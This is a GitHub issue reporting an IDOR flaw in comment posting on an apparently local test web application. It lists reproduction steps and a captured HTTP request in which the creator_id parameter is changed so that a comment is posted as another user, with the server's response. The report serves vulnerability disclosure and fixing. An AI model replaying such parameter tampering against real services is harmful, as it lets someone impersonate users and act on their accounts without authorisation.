Skip to content

IDOR on comment  #1

New issue
New issue
Open
Open
IDOR on comment #1
@jeremybuis

Description

@jeremybuis
jeremybuis
opened on Oct 26, 2017

Steps to reproduce:

  1. register and login as normal user
  2. Post a comment
  3. Intercepted the request and changed the creator id to another user
  4. Resent the request as the other user

Here are the request and responses showing posting a comment as another user. For reference my user has an id of 1002

Attack Request

POST /comment HTTP/1.1
Host: 192.168.99.100:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 60
Referer: https://192.168.99.100:8443/wall?user_id=1002
Cookie: JSESSIONID=CB39DD1389BDE85C38D86EDE670B1363
Connection: close
Upgrade-Insecure-Requests: 1

on_wall=1&creator_id=486&post_id=2892&content=Sandra Comment

Attack Response

HTTP/1.1 302 
Location: wall?user_id=1002#2892
Content-Length: 0
Date: Thu, 26 Oct 2017 13:45:32 GMT
Connection: close

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions